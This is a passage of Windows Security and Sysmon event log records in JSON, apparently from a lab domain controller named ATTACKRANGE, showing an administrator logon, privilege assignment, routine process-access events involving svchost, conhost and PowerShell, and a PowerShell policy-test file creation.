services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x7e458","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{D92923DA-CBA2-281E-6820-146722971F2E}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220554,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":3916,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x7E458\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x7e458","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5408,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5409,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5410,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5411,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5412,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5413,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.540\r\nSourceProcessGUID: {E2A3D6B1-11D2-5F25-0000-001089BB0700}\r\nSourceProcessId: 2892\r\nSourceThreadId: 3144\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.540","SourceProcessGUID":"{E2A3D6B1-11D2-5F25-0000-001089BB0700}","SourceProcessId":"2892","SourceThreadId":"3144","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5414,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.572\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nTargetProcessId: 4780\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.572","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","TargetProcessId":"4780","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:15","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5415,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:15.572\r\nProcessGuid: {E2A3D6B1-11D3-5F25-0000-001046E60700}\r\nProcessId: 4780\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0cjo45t3.xac.ps1\r\nCreationUtcTime: 2020-08-01 06:55:15.572","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 06:55:15.572","ProcessGuid":"{E2A3D6B1-11D3-5F25-0000-001046E60700}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_0cjo45t3.xac.ps1","CreationUtcTime":"2020-08-01 06:55:15.572","EventReceivedTime":"2020-08-01 06:55:16","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
